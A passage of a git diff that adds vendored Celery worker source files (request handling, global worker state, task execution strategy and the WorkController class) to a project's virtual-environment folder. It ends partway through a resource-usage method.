+ request.update({ + 'loglevel': loglevel, + 'logfile': logfile, + 'is_eager': False, + }, **embed or {}) + + retval, I, _, _ = trace_task(self.task, self.id, self._args, self._kwargs, request, + hostname=self._hostname, loader=self._app.loader, + app=self._app) + + if I: + self.reject(requeue=False) + else: + self.acknowledge() + return retval + + def maybe_expire(self): + """If expired, mark the task as revoked.""" + if self.expires: + now = datetime.now(self.expires.tzinfo) + if now > self.expires: + revoked_tasks.add(self.id) + return True + + def terminate(self, pool, signal=None): + signal = _signals.signum(signal or TERM_SIGNAME) + if self.time_start: + pool.terminate_job(self.worker_pid, signal) + self._announce_revoked('terminated', True, signal, False) + else: + self._terminate_on_ack = pool, signal + if self._apply_result is not None: + obj = self._apply_result() # is a weakref + if obj is not None: + obj.terminate(signal) + + def cancel(self, pool, signal=None): + signal = _signals.signum(signal or TERM_SIGNAME) + if self.time_start: + pool.terminate_job(self.worker_pid, signal) + self._announce_cancelled() + + if self._apply_result is not None: + obj = self._apply_result() # is a weakref + if obj is not None: + obj.terminate(signal) + + def _announce_cancelled(self): + task_ready(self) + self.send_event('task-cancelled') + reason = 'cancelled by Celery' + exc = Retry(message=reason) + self.task.backend.mark_as_retry(self.id, + exc, + request=self._context) + + self.task.on_retry(exc, self.id, self.args, self.kwargs, None) + self._already_cancelled = True + send_retry(self.task, request=self._context, einfo=None) + + def _announce_revoked(self, reason, terminated, signum, expired): + task_ready(self) + self.send_event('task-revoked', + terminated=terminated, signum=signum, expired=expired) + self.task.backend.mark_as_revoked( + self.id, reason, request=self._context, + store_result=self.store_errors, + ) + self.acknowledge() + self._already_revoked = True + send_revoked(self.task, request=self._context, + terminated=terminated, signum=signum, expired=expired) + + def revoked(self): + """If revoked, skip task and mark state.""" + expired = False + if self._already_revoked: + return True + if self.expires: + expired = self.maybe_expire() + revoked_by_id = self.id in revoked_tasks + revoked_by_header, revoking_header = False, None + + if not revoked_by_id and self.stamped_headers: + for stamp in self.stamped_headers: + if stamp in revoked_stamps: + revoked_header = revoked_stamps[stamp] + stamped_header = self._message.headers['stamps'][stamp] + + if isinstance(stamped_header, (list, tuple)): + for stamped_value in stamped_header: + if stamped_value in maybe_list(revoked_header): + revoked_by_header = True + revoking_header = {stamp: stamped_value} + break + else: + revoked_by_header = any([ + stamped_header in maybe_list(revoked_header), + stamped_header == revoked_header, # When the header is a single set value + ]) + revoking_header = {stamp: stamped_header} + break + + if any((expired, revoked_by_id, revoked_by_header)): + log_msg = 'Discarding revoked task: %s[%s]' + if revoked_by_header: + log_msg += ' (revoked by header: %s)' % revoking_header + info(log_msg, self.name, self.id) + self._announce_revoked( + 'expired' if expired else 'revoked', False, None, expired, + ) + return True + return False + + def send_event(self, type, **fields): + if self._eventer and self._eventer.enabled and self.task.send_events: + self._eventer.send(type, uuid=self.id, **fields) + + def 
on_accepted(self, pid, time_accepted): + """Handler called when task is accepted by worker pool.""" + self.worker_pid = pid + # Convert monotonic time_accepted to absolute time + self.time_start = time() - (monotonic() - time_accepted) + task_accepted(self) + if not self.task.acks_late: + self.acknowledge() + self.send_event('task-started') + if _does_debug: + debug('Task accepted: %s[%s] pid:%r', self.name, self.id, pid) + if self._terminate_on_ack is not None: + self.terminate(*self._terminate_on_ack) + + def on_timeout(self, soft, timeout): + """Handler called if the task times out.""" + if soft: + warn('Soft time limit (%ss) exceeded for %s[%s]', + timeout, self.name, self.id) + else: + task_ready(self) + error('Hard time limit (%ss) exceeded for %s[%s]', + timeout, self.name, self.id) + exc = TimeLimitExceeded(timeout) + + self.task.backend.mark_as_failure( + self.id, exc, request=self._context, + store_result=self.store_errors, + ) + + if self.task.acks_late and self.task.acks_on_failure_or_timeout: + self.acknowledge() + + def on_success(self, failed__retval__runtime, **kwargs): + """Handler called if the task was successfully processed.""" + failed, retval, runtime = failed__retval__runtime + if failed: + exc = retval.exception + if isinstance(exc, ExceptionWithTraceback): + exc = exc.exc + if isinstance(exc, (SystemExit, KeyboardInterrupt)): + raise exc + return self.on_failure(retval, return_ok=True) + task_ready(self, successful=True) + + if self.task.acks_late: + self.acknowledge() + + self.send_event('task-succeeded', result=retval, runtime=runtime) + + def on_retry(self, exc_info): + """Handler called if the task should be retried.""" + if self.task.acks_late: + self.acknowledge() + + self.send_event('task-retried', + exception=safe_repr(exc_info.exception.exc), + traceback=safe_str(exc_info.traceback)) + + def on_failure(self, exc_info, send_failed_event=True, return_ok=False): + """Handler called if the task raised an exception.""" + task_ready(self) + exc = exc_info.exception + + if isinstance(exc, ExceptionWithTraceback): + exc = exc.exc + + is_terminated = isinstance(exc, Terminated) + if is_terminated: + # If the task was terminated and the task was not cancelled due + # to a connection loss, it is revoked. + + # We always cancel the tasks inside the master process. + # If the request was cancelled, it was not revoked and there's + # nothing to be done. + # According to the comment below, we need to check if the task + # is already revoked and if it wasn't, we should announce that + # it was. + if not self._already_cancelled and not self._already_revoked: + # This is a special case where the process + # would not have had time to write the result. + self._announce_revoked( + 'terminated', True, str(exc), False) + return + elif isinstance(exc, MemoryError): + raise MemoryError(f'Process got: {exc}') + elif isinstance(exc, Reject): + return self.reject(requeue=exc.requeue) + elif isinstance(exc, Ignore): + return self.acknowledge() + elif isinstance(exc, Retry): + return self.on_retry(exc_info) + + # (acks_late) acknowledge after result stored. 
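+ # Summary of the acks_late handling below: reject_on_worker_lost requeues + # the message, acks_on_failure_or_timeout acknowledges it, and otherwise + # the message is rejected without requeue so it leaves the local prefetch + # queue.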
+ requeue = False + is_worker_lost = isinstance(exc, WorkerLostError) + if self.task.acks_late: + reject = ( + self.task.reject_on_worker_lost and + is_worker_lost + ) + ack = self.task.acks_on_failure_or_timeout + if reject: + requeue = True + self.reject(requeue=requeue) + send_failed_event = False + elif ack: + self.acknowledge() + else: + # supporting the behaviour where a task failed and + # need to be removed from prefetched local queue + self.reject(requeue=False) + + # This is a special case where the process would not have had time + # to write the result. + if not requeue and (is_worker_lost or not return_ok): + # only mark as failure if task has not been requeued + self.task.backend.mark_as_failure( + self.id, exc, request=self._context, + store_result=self.store_errors, + ) + + signals.task_failure.send(sender=self.task, task_id=self.id, + exception=exc, args=self.args, + kwargs=self.kwargs, + traceback=exc_info.traceback, + einfo=exc_info) + + if send_failed_event: + self.send_event( + 'task-failed', + exception=safe_repr(get_pickled_exception(exc_info.exception)), + traceback=exc_info.traceback, + ) + + if not return_ok: + error('Task handler raised error: %r', exc, + exc_info=exc_info.exc_info) + + def acknowledge(self): + """Acknowledge task.""" + if not self.acknowledged: + self._on_ack(logger, self._connection_errors) + self.acknowledged = True + + def reject(self, requeue=False): + if not self.acknowledged: + self._on_reject(logger, self._connection_errors, requeue) + self.acknowledged = True + self.send_event('task-rejected', requeue=requeue) + + def info(self, safe=False): + return { + 'id': self.id, + 'name': self.name, + 'args': self._args if not safe else self._argsrepr, + 'kwargs': self._kwargs if not safe else self._kwargsrepr, + 'type': self._type, + 'hostname': self._hostname, + 'time_start': self.time_start, + 'acknowledged': self.acknowledged, + 'delivery_info': self.delivery_info, + 'worker_pid': self.worker_pid, + } + + def humaninfo(self): + return '{0.name}[{0.id}]'.format(self) + + def __str__(self): + """``str(self)``.""" + return ' '.join([ + self.humaninfo(), + f' ETA:[{self._eta}]' if self._eta else '', + f' expires:[{self._expires}]' if self._expires else '', + ]).strip() + + def __repr__(self): + """``repr(self)``.""" + return '<{}: {} {} {}>'.format( + type(self).__name__, self.humaninfo(), + self._argsrepr, self._kwargsrepr, + ) + + @cached_property + def _payload(self): + return self.__payload + + @cached_property + def chord(self): + # used by backend.mark_as_failure when failure is reported + # by parent process + # pylint: disable=unpacking-non-sequence + # payload is a property, so pylint doesn't think it's a tuple. + _, _, embed = self._payload + return embed.get('chord') + + @cached_property + def errbacks(self): + # used by backend.mark_as_failure when failure is reported + # by parent process + # pylint: disable=unpacking-non-sequence + # payload is a property, so pylint doesn't think it's a tuple. + _, _, embed = self._payload + return embed.get('errbacks') + + @cached_property + def group(self): + # used by backend.on_chord_part_return when failures reported + # by parent process + return self._request_dict.get('group') + + @cached_property + def _context(self): + """Context (:class:`~celery.app.task.Context`) of this task.""" + request = self._request_dict + # pylint: disable=unpacking-non-sequence + # payload is a property, so pylint doesn't think it's a tuple. 
+ _, _, embed = self._payload + request.update(**embed or {}) + return Context(request) + + @cached_property + def group_index(self): + # used by backend.on_chord_part_return to order return values in group + return self._request_dict.get('group_index') + + +def create_request_cls(base, task, pool, hostname, eventer, + ref=ref, revoked_tasks=revoked_tasks, + task_ready=task_ready, trace=None, app=current_app): + default_time_limit = task.time_limit + default_soft_time_limit = task.soft_time_limit + apply_async = pool.apply_async + acks_late = task.acks_late + events = eventer and eventer.enabled + + if trace is None: + trace = fast_trace_task if app.use_fast_trace_task else trace_task_ret + + class Request(base): + + def execute_using_pool(self, pool, **kwargs): + task_id = self.task_id + if self.revoked(): + raise TaskRevokedError(task_id) + + time_limit, soft_time_limit = self.time_limits + result = apply_async( + trace, + args=(self.type, task_id, self.request_dict, self.body, + self.content_type, self.content_encoding), + accept_callback=self.on_accepted, + timeout_callback=self.on_timeout, + callback=self.on_success, + error_callback=self.on_failure, + soft_timeout=soft_time_limit or default_soft_time_limit, + timeout=time_limit or default_time_limit, + correlation_id=task_id, + ) + # cannot create weakref to None + # pylint: disable=attribute-defined-outside-init + self._apply_result = maybe(ref, result) + return result + + def on_success(self, failed__retval__runtime, **kwargs): + failed, retval, runtime = failed__retval__runtime + if failed: + exc = retval.exception + if isinstance(exc, ExceptionWithTraceback): + exc = exc.exc + if isinstance(exc, (SystemExit, KeyboardInterrupt)): + raise exc + return self.on_failure(retval, return_ok=True) + task_ready(self) + + if acks_late: + self.acknowledge() + + if events: + self.send_event( + 'task-succeeded', result=retval, runtime=runtime, + ) + + return Request diff --git a/env/Lib/site-packages/celery/worker/state.py b/env/Lib/site-packages/celery/worker/state.py new file mode 100644 index 00000000..8c70bbd9 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/state.py @@ -0,0 +1,288 @@ +"""Internal worker state (global). + +This includes the currently active and reserved tasks, +statistics, and revoked tasks. +""" +import os +import platform +import shelve +import sys +import weakref +import zlib +from collections import Counter + +from kombu.serialization import pickle, pickle_protocol +from kombu.utils.objects import cached_property + +from celery import __version__ +from celery.exceptions import WorkerShutdown, WorkerTerminate +from celery.utils.collections import LimitedSet + +__all__ = ( + 'SOFTWARE_INFO', 'reserved_requests', 'active_requests', + 'total_count', 'revoked', 'task_reserved', 'maybe_shutdown', + 'task_accepted', 'task_ready', 'Persistent', +) + +#: Worker software/platform information. +SOFTWARE_INFO = { + 'sw_ident': 'py-celery', + 'sw_ver': __version__, + 'sw_sys': platform.system(), +} + +#: maximum number of revokes to keep in memory. +REVOKES_MAX = int(os.environ.get('CELERY_WORKER_REVOKES_MAX', 50000)) + +#: maximum number of successful tasks to keep in memory. +SUCCESSFUL_MAX = int(os.environ.get('CELERY_WORKER_SUCCESSFUL_MAX', 1000)) + +#: how many seconds a revoke will be active before +#: being expired when the max limit has been exceeded. 
+REVOKE_EXPIRES = float(os.environ.get('CELERY_WORKER_REVOKE_EXPIRES', 10800)) + +#: how many seconds a successful task will be cached in memory +#: before being expired when the max limit has been exceeded. +SUCCESSFUL_EXPIRES = float(os.environ.get('CELERY_WORKER_SUCCESSFUL_EXPIRES', 10800)) + +#: Mapping of reserved task_id->Request. +requests = {} + +#: set of all reserved :class:`~celery.worker.request.Request`'s. +reserved_requests = weakref.WeakSet() + +#: set of currently active :class:`~celery.worker.request.Request`'s. +active_requests = weakref.WeakSet() + +#: A limited set of successful :class:`~celery.worker.request.Request`'s. +successful_requests = LimitedSet(maxlen=SUCCESSFUL_MAX, + expires=SUCCESSFUL_EXPIRES) + +#: count of tasks accepted by the worker, sorted by type. +total_count = Counter() + +#: count of all tasks accepted by the worker +all_total_count = [0] + +#: the list of currently revoked tasks. Persistent if ``statedb`` set. +revoked = LimitedSet(maxlen=REVOKES_MAX, expires=REVOKE_EXPIRES) + +#: Mapping of stamped headers flagged for revoking. +revoked_stamps = {} + +should_stop = None +should_terminate = None + + +def reset_state(): + requests.clear() + reserved_requests.clear() + active_requests.clear() + successful_requests.clear() + total_count.clear() + all_total_count[:] = [0] + revoked.clear() + revoked_stamps.clear() + + +def maybe_shutdown(): + """Shutdown if flags have been set.""" + if should_terminate is not None and should_terminate is not False: + raise WorkerTerminate(should_terminate) + elif should_stop is not None and should_stop is not False: + raise WorkerShutdown(should_stop) + + +def task_reserved(request, + add_request=requests.__setitem__, + add_reserved_request=reserved_requests.add): + """Update global state when a task has been reserved.""" + add_request(request.id, request) + add_reserved_request(request) + + +def task_accepted(request, + _all_total_count=None, + add_request=requests.__setitem__, + add_active_request=active_requests.add, + add_to_total_count=total_count.update): + """Update global state when a task has been accepted.""" + if not _all_total_count: + _all_total_count = all_total_count + add_request(request.id, request) + add_active_request(request) + add_to_total_count({request.name: 1}) + all_total_count[0] += 1 + + +def task_ready(request, + successful=False, + remove_request=requests.pop, + discard_active_request=active_requests.discard, + discard_reserved_request=reserved_requests.discard): + """Update global state when a task is ready.""" + if successful: + successful_requests.add(request.id) + + remove_request(request.id, None) + discard_active_request(request) + discard_reserved_request(request) + + +C_BENCH = os.environ.get('C_BENCH') or os.environ.get('CELERY_BENCH') +C_BENCH_EVERY = int(os.environ.get('C_BENCH_EVERY') or + os.environ.get('CELERY_BENCH_EVERY') or 1000) +if C_BENCH: # pragma: no cover + import atexit + from time import monotonic + + from billiard.process import current_process + + from celery.utils.debug import memdump, sample_mem + + all_count = 0 + bench_first = None + bench_start = None + bench_last = None + bench_every = C_BENCH_EVERY + bench_sample = [] + __reserved = task_reserved + __ready = task_ready + + if current_process()._name == 'MainProcess': + @atexit.register + def on_shutdown(): + if bench_first is not None and bench_last is not None: + print('- Time spent in benchmark: {!r}'.format( + bench_last - bench_first)) + print('- Avg: {}'.format( + sum(bench_sample) / 
len(bench_sample))) + memdump() + + def task_reserved(request): + """Called when a task is reserved by the worker.""" + global bench_start + global bench_first + now = None + if bench_start is None: + bench_start = now = monotonic() + if bench_first is None: + bench_first = now + + return __reserved(request) + + def task_ready(request): + """Called when a task is completed.""" + global all_count + global bench_start + global bench_last + all_count += 1 + if not all_count % bench_every: + now = monotonic() + diff = now - bench_start + print('- Time spent processing {} tasks (since first ' + 'task received): ~{:.4f}s\n'.format(bench_every, diff)) + sys.stdout.flush() + bench_start = bench_last = now + bench_sample.append(diff) + sample_mem() + return __ready(request) + + +class Persistent: + """Stores worker state between restarts. + + This is the persistent data stored by the worker when + :option:`celery worker --statedb` is enabled. + + Currently only stores revoked task id's. + """ + + storage = shelve + protocol = pickle_protocol + compress = zlib.compress + decompress = zlib.decompress + _is_open = False + + def __init__(self, state, filename, clock=None): + self.state = state + self.filename = filename + self.clock = clock + self.merge() + + def open(self): + return self.storage.open( + self.filename, protocol=self.protocol, writeback=True, + ) + + def merge(self): + self._merge_with(self.db) + + def sync(self): + self._sync_with(self.db) + self.db.sync() + + def close(self): + if self._is_open: + self.db.close() + self._is_open = False + + def save(self): + self.sync() + self.close() + + def _merge_with(self, d): + self._merge_revoked(d) + self._merge_clock(d) + return d + + def _sync_with(self, d): + self._revoked_tasks.purge() + d.update({ + '__proto__': 3, + 'zrevoked': self.compress(self._dumps(self._revoked_tasks)), + 'clock': self.clock.forward() if self.clock else 0, + }) + return d + + def _merge_clock(self, d): + if self.clock: + d['clock'] = self.clock.adjust(d.get('clock') or 0) + + def _merge_revoked(self, d): + try: + self._merge_revoked_v3(d['zrevoked']) + except KeyError: + try: + self._merge_revoked_v2(d.pop('revoked')) + except KeyError: + pass + # purge expired items at boot + self._revoked_tasks.purge() + + def _merge_revoked_v3(self, zrevoked): + if zrevoked: + self._revoked_tasks.update(pickle.loads(self.decompress(zrevoked))) + + def _merge_revoked_v2(self, saved): + if not isinstance(saved, LimitedSet): + # (pre 3.0.18) used to be stored as a dict + return self._merge_revoked_v1(saved) + self._revoked_tasks.update(saved) + + def _merge_revoked_v1(self, saved): + add = self._revoked_tasks.add + for item in saved: + add(item) + + def _dumps(self, obj): + return pickle.dumps(obj, protocol=self.protocol) + + @property + def _revoked_tasks(self): + return self.state.revoked + + @cached_property + def db(self): + self._is_open = True + return self.open() diff --git a/env/Lib/site-packages/celery/worker/strategy.py b/env/Lib/site-packages/celery/worker/strategy.py new file mode 100644 index 00000000..3fe5fa14 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/strategy.py @@ -0,0 +1,208 @@ +"""Task execution strategy (optimization).""" +import logging + +from kombu.asynchronous.timer import to_timestamp + +from celery import signals +from celery.app import trace as _app_trace +from celery.exceptions import InvalidTaskError +from celery.utils.imports import symbol_by_name +from celery.utils.log import get_logger +from celery.utils.saferepr import saferepr +from 
celery.utils.time import timezone + +from .request import create_request_cls +from .state import task_reserved + +__all__ = ('default',) + +logger = get_logger(__name__) + +# pylint: disable=redefined-outer-name +# We cache globals and attribute lookups, so disable this warning. + + +def hybrid_to_proto2(message, body): + """Create a fresh protocol 2 message from a hybrid protocol 1/2 message.""" + try: + args, kwargs = body.get('args', ()), body.get('kwargs', {}) + kwargs.items # pylint: disable=pointless-statement + except KeyError: + raise InvalidTaskError('Message does not have args/kwargs') + except AttributeError: + raise InvalidTaskError( + 'Task keyword arguments must be a mapping', + ) + + headers = { + 'lang': body.get('lang'), + 'task': body.get('task'), + 'id': body.get('id'), + 'root_id': body.get('root_id'), + 'parent_id': body.get('parent_id'), + 'group': body.get('group'), + 'meth': body.get('meth'), + 'shadow': body.get('shadow'), + 'eta': body.get('eta'), + 'expires': body.get('expires'), + 'retries': body.get('retries', 0), + 'timelimit': body.get('timelimit', (None, None)), + 'argsrepr': body.get('argsrepr'), + 'kwargsrepr': body.get('kwargsrepr'), + 'origin': body.get('origin'), + } + headers.update(message.headers or {}) + + embed = { + 'callbacks': body.get('callbacks'), + 'errbacks': body.get('errbacks'), + 'chord': body.get('chord'), + 'chain': None, + } + + return (args, kwargs, embed), headers, True, body.get('utc', True) + + +def proto1_to_proto2(message, body): + """Convert Task message protocol 1 arguments to protocol 2. + + Returns: + Tuple: of ``(body, headers, already_decoded_status, utc)`` + """ + try: + args, kwargs = body.get('args', ()), body.get('kwargs', {}) + kwargs.items # pylint: disable=pointless-statement + except KeyError: + raise InvalidTaskError('Message does not have args/kwargs') + except AttributeError: + raise InvalidTaskError( + 'Task keyword arguments must be a mapping', + ) + body.update( + argsrepr=saferepr(args), + kwargsrepr=saferepr(kwargs), + headers=message.headers, + ) + try: + body['group'] = body['taskset'] + except KeyError: + pass + embed = { + 'callbacks': body.get('callbacks'), + 'errbacks': body.get('errbacks'), + 'chord': body.get('chord'), + 'chain': None, + } + return (args, kwargs, embed), body, True, body.get('utc', True) + + +def default(task, app, consumer, + info=logger.info, error=logger.error, task_reserved=task_reserved, + to_system_tz=timezone.to_system, bytes=bytes, + proto1_to_proto2=proto1_to_proto2): + """Default task execution strategy. + + Note: + Strategies are here as an optimization, so sadly + it's not very easy to override. 
+ """ + hostname = consumer.hostname + connection_errors = consumer.connection_errors + _does_info = logger.isEnabledFor(logging.INFO) + + # task event related + # (optimized to avoid calling request.send_event) + eventer = consumer.event_dispatcher + events = eventer and eventer.enabled + send_event = eventer and eventer.send + task_sends_events = events and task.send_events + + call_at = consumer.timer.call_at + apply_eta_task = consumer.apply_eta_task + rate_limits_enabled = not consumer.disable_rate_limits + get_bucket = consumer.task_buckets.__getitem__ + handle = consumer.on_task_request + limit_task = consumer._limit_task + limit_post_eta = consumer._limit_post_eta + Request = symbol_by_name(task.Request) + Req = create_request_cls(Request, task, consumer.pool, hostname, eventer, app=app) + + revoked_tasks = consumer.controller.state.revoked + + def task_message_handler(message, body, ack, reject, callbacks, + to_timestamp=to_timestamp): + if body is None and 'args' not in message.payload: + body, headers, decoded, utc = ( + message.body, message.headers, False, app.uses_utc_timezone(), + ) + else: + if 'args' in message.payload: + body, headers, decoded, utc = hybrid_to_proto2(message, + message.payload) + else: + body, headers, decoded, utc = proto1_to_proto2(message, body) + + req = Req( + message, + on_ack=ack, on_reject=reject, app=app, hostname=hostname, + eventer=eventer, task=task, connection_errors=connection_errors, + body=body, headers=headers, decoded=decoded, utc=utc, + ) + if _does_info: + # Similar to `app.trace.info()`, we pass the formatting args as the + # `extra` kwarg for custom log handlers + context = { + 'id': req.id, + 'name': req.name, + 'args': req.argsrepr, + 'kwargs': req.kwargsrepr, + 'eta': req.eta, + } + info(_app_trace.LOG_RECEIVED, context, extra={'data': context}) + if (req.expires or req.id in revoked_tasks) and req.revoked(): + return + + signals.task_received.send(sender=consumer, request=req) + + if task_sends_events: + send_event( + 'task-received', + uuid=req.id, name=req.name, + args=req.argsrepr, kwargs=req.kwargsrepr, + root_id=req.root_id, parent_id=req.parent_id, + retries=req.request_dict.get('retries', 0), + eta=req.eta and req.eta.isoformat(), + expires=req.expires and req.expires.isoformat(), + ) + + bucket = None + eta = None + if req.eta: + try: + if req.utc: + eta = to_timestamp(to_system_tz(req.eta)) + else: + eta = to_timestamp(req.eta, app.timezone) + except (OverflowError, ValueError) as exc: + error("Couldn't convert ETA %r to timestamp: %r. Task: %r", + req.eta, exc, req.info(safe=True), exc_info=True) + req.reject(requeue=False) + if rate_limits_enabled: + bucket = get_bucket(task.name) + + if eta and bucket: + consumer.qos.increment_eventually() + return call_at(eta, limit_post_eta, (req, bucket, 1), + priority=6) + if eta: + consumer.qos.increment_eventually() + call_at(eta, apply_eta_task, (req,), priority=6) + return task_message_handler + if bucket: + return limit_task(req, bucket, 1) + + task_reserved(req) + if callbacks: + [callback(req) for callback in callbacks] + handle(req) + return task_message_handler diff --git a/env/Lib/site-packages/celery/worker/worker.py b/env/Lib/site-packages/celery/worker/worker.py new file mode 100644 index 00000000..04f8c30e --- /dev/null +++ b/env/Lib/site-packages/celery/worker/worker.py @@ -0,0 +1,409 @@ +"""WorkController can be used to instantiate in-process workers. 
+ +The command-line interface for the worker is in :mod:`celery.bin.worker`, +while the worker program is in :mod:`celery.apps.worker`. + +The worker program is responsible for adding signal handlers, +setting up logging, etc. This is a bare-bones worker without +global side-effects (i.e., except for the global state stored in +:mod:`celery.worker.state`). + +The worker consists of several components, all managed by bootsteps +(mod:`celery.bootsteps`). +""" + +import os +import sys +from datetime import datetime + +from billiard import cpu_count +from kombu.utils.compat import detect_environment + +from celery import bootsteps +from celery import concurrency as _concurrency +from celery import signals +from celery.bootsteps import RUN, TERMINATE +from celery.exceptions import ImproperlyConfigured, TaskRevokedError, WorkerTerminate +from celery.platforms import EX_FAILURE, create_pidlock +from celery.utils.imports import reload_from_cwd +from celery.utils.log import mlevel +from celery.utils.log import worker_logger as logger +from celery.utils.nodenames import default_nodename, worker_direct +from celery.utils.text import str_to_list +from celery.utils.threads import default_socket_timeout + +from . import state + +try: + import resource +except ImportError: + resource = None + + +__all__ = ('WorkController',) + +#: Default socket timeout at shutdown. +SHUTDOWN_SOCKET_TIMEOUT = 5.0 + +SELECT_UNKNOWN_QUEUE = """ +Trying to select queue subset of {0!r}, but queue {1} isn't +defined in the `task_queues` setting. + +If you want to automatically declare unknown queues you can +enable the `task_create_missing_queues` setting. +""" + +DESELECT_UNKNOWN_QUEUE = """ +Trying to deselect queue subset of {0!r}, but queue {1} isn't +defined in the `task_queues` setting. +""" + + +class WorkController: + """Unmanaged worker instance.""" + + app = None + + pidlock = None + blueprint = None + pool = None + semaphore = None + + #: contains the exit code if a :exc:`SystemExit` event is handled. 
+ exitcode = None + + class Blueprint(bootsteps.Blueprint): + """Worker bootstep blueprint.""" + + name = 'Worker' + default_steps = { + 'celery.worker.components:Hub', + 'celery.worker.components:Pool', + 'celery.worker.components:Beat', + 'celery.worker.components:Timer', + 'celery.worker.components:StateDB', + 'celery.worker.components:Consumer', + 'celery.worker.autoscale:WorkerComponent', + } + + def __init__(self, app=None, hostname=None, **kwargs): + self.app = app or self.app + self.hostname = default_nodename(hostname) + self.startup_time = datetime.utcnow() + self.app.loader.init_worker() + self.on_before_init(**kwargs) + self.setup_defaults(**kwargs) + self.on_after_init(**kwargs) + + self.setup_instance(**self.prepare_args(**kwargs)) + + def setup_instance(self, queues=None, ready_callback=None, pidfile=None, + include=None, use_eventloop=None, exclude_queues=None, + **kwargs): + self.pidfile = pidfile + self.setup_queues(queues, exclude_queues) + self.setup_includes(str_to_list(include)) + + # Set default concurrency + if not self.concurrency: + try: + self.concurrency = cpu_count() + except NotImplementedError: + self.concurrency = 2 + + # Options + self.loglevel = mlevel(self.loglevel) + self.ready_callback = ready_callback or self.on_consumer_ready + + # this connection won't establish, only used for params + self._conninfo = self.app.connection_for_read() + self.use_eventloop = ( + self.should_use_eventloop() if use_eventloop is None + else use_eventloop + ) + self.options = kwargs + + signals.worker_init.send(sender=self) + + # Initialize bootsteps + self.pool_cls = _concurrency.get_implementation(self.pool_cls) + self.steps = [] + self.on_init_blueprint() + self.blueprint = self.Blueprint( + steps=self.app.steps['worker'], + on_start=self.on_start, + on_close=self.on_close, + on_stopped=self.on_stopped, + ) + self.blueprint.apply(self, **kwargs) + + def on_init_blueprint(self): + pass + + def on_before_init(self, **kwargs): + pass + + def on_after_init(self, **kwargs): + pass + + def on_start(self): + if self.pidfile: + self.pidlock = create_pidlock(self.pidfile) + + def on_consumer_ready(self, consumer): + pass + + def on_close(self): + self.app.loader.shutdown_worker() + + def on_stopped(self): + self.timer.stop() + self.consumer.shutdown() + + if self.pidlock: + self.pidlock.release() + + def setup_queues(self, include, exclude=None): + include = str_to_list(include) + exclude = str_to_list(exclude) + try: + self.app.amqp.queues.select(include) + except KeyError as exc: + raise ImproperlyConfigured( + SELECT_UNKNOWN_QUEUE.strip().format(include, exc)) + try: + self.app.amqp.queues.deselect(exclude) + except KeyError as exc: + raise ImproperlyConfigured( + DESELECT_UNKNOWN_QUEUE.strip().format(exclude, exc)) + if self.app.conf.worker_direct: + self.app.amqp.queues.select_add(worker_direct(self.hostname)) + + def setup_includes(self, includes): + # Update celery_include to have all known task modules, so that we + # ensure all task modules are imported in case an execv happens. 
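+        # An execv replaces the running worker process with a fresh
+        # interpreter, so every module that defines tasks has to be importable
+        # from the resulting ``include`` setting alone.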
+ prev = tuple(self.app.conf.include) + if includes: + prev += tuple(includes) + [self.app.loader.import_task_module(m) for m in includes] + self.include = includes + task_modules = {task.__class__.__module__ + for task in self.app.tasks.values()} + self.app.conf.include = tuple(set(prev) | task_modules) + + def prepare_args(self, **kwargs): + return kwargs + + def _send_worker_shutdown(self): + signals.worker_shutdown.send(sender=self) + + def start(self): + try: + self.blueprint.start(self) + except WorkerTerminate: + self.terminate() + except Exception as exc: + logger.critical('Unrecoverable error: %r', exc, exc_info=True) + self.stop(exitcode=EX_FAILURE) + except SystemExit as exc: + self.stop(exitcode=exc.code) + except KeyboardInterrupt: + self.stop(exitcode=EX_FAILURE) + + def register_with_event_loop(self, hub): + self.blueprint.send_all( + self, 'register_with_event_loop', args=(hub,), + description='hub.register', + ) + + def _process_task_sem(self, req): + return self._quick_acquire(self._process_task, req) + + def _process_task(self, req): + """Process task by sending it to the pool of workers.""" + try: + req.execute_using_pool(self.pool) + except TaskRevokedError: + try: + self._quick_release() # Issue 877 + except AttributeError: + pass + + def signal_consumer_close(self): + try: + self.consumer.close() + except AttributeError: + pass + + def should_use_eventloop(self): + return (detect_environment() == 'default' and + self._conninfo.transport.implements.asynchronous and + not self.app.IS_WINDOWS) + + def stop(self, in_sighandler=False, exitcode=None): + """Graceful shutdown of the worker server.""" + if exitcode is not None: + self.exitcode = exitcode + if self.blueprint.state == RUN: + self.signal_consumer_close() + if not in_sighandler or self.pool.signal_safe: + self._shutdown(warm=True) + self._send_worker_shutdown() + + def terminate(self, in_sighandler=False): + """Not so graceful shutdown of the worker server.""" + if self.blueprint.state != TERMINATE: + self.signal_consumer_close() + if not in_sighandler or self.pool.signal_safe: + self._shutdown(warm=False) + + def _shutdown(self, warm=True): + # if blueprint does not exist it means that we had an + # error before the bootsteps could be initialized. 
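+        # ``warm=True`` asks the blueprint for a graceful stop, letting running
+        # tasks finish; ``warm=False`` terminates them (``terminate=True``).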
+        if self.blueprint is not None:
+            with default_socket_timeout(SHUTDOWN_SOCKET_TIMEOUT):  # Issue 975
+                self.blueprint.stop(self, terminate=not warm)
+                self.blueprint.join()
+
+    def reload(self, modules=None, reload=False, reloader=None):
+        list(self._reload_modules(
+            modules, force_reload=reload, reloader=reloader))
+
+        if self.consumer:
+            self.consumer.update_strategies()
+            self.consumer.reset_rate_limits()
+        try:
+            self.pool.restart()
+        except NotImplementedError:
+            pass
+
+    def _reload_modules(self, modules=None, **kwargs):
+        return (
+            self._maybe_reload_module(m, **kwargs)
+            for m in set(self.app.loader.task_modules
+                         if modules is None else (modules or ()))
+        )
+
+    def _maybe_reload_module(self, module, force_reload=False, reloader=None):
+        if module not in sys.modules:
+            logger.debug('importing module %s', module)
+            return self.app.loader.import_from_cwd(module)
+        elif force_reload:
+            logger.debug('reloading module %s', module)
+            return reload_from_cwd(sys.modules[module], reloader)
+
+    def info(self):
+        uptime = datetime.utcnow() - self.startup_time
+        return {'total': self.state.total_count,
+                'pid': os.getpid(),
+                'clock': str(self.app.clock),
+                'uptime': round(uptime.total_seconds())}
+
+    def rusage(self):
+        if resource is None:
+            raise NotImplementedError('rusage not supported by this platform')
+        s = resource.getrusage(resource.RUSAGE_SELF)
+        return {
+            'utime': s.ru_utime,
+            'stime': s.ru_stime,
+            'maxrss': s.ru_maxrss,
+            'ixrss': s.ru_ixrss,
+            'idrss': s.ru_idrss,
+            'isrss': s.ru_isrss,
+            'minflt': s.ru_minflt,
+            'majflt': s.ru_majflt,
+            'nswap': s.ru_nswap,
+            'inblock': s.ru_inblock,
+            'oublock': s.ru_oublock,
